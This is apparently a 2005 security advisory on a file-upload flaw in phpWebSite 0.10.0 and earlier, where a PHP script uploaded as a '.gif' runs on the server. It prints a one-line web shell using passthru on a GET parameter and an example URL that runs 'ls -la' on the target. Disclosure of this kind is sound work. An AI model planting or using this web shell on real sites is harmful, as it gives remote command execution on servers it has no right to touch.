Sunday, March 06, 2005
PHP include in phpWebSite
PHP include in phpWebSite
Summary:
Anyone, who has permissions to add announces, can upload php-script asa .gif file and execute it.
Example:
Summary:
Anyone, who has permissions to add announces, can upload php-script asa .gif file and execute it.
Example:
http://[target]/images/announce/[anyname].gif.php?nst=ls –la
Where [anyname].gif.php - php-script with this line:
passthru($_GET[nst]);
Vulnerable Systems:Official Website: phpWebSitephpWebSite <= 0.10.0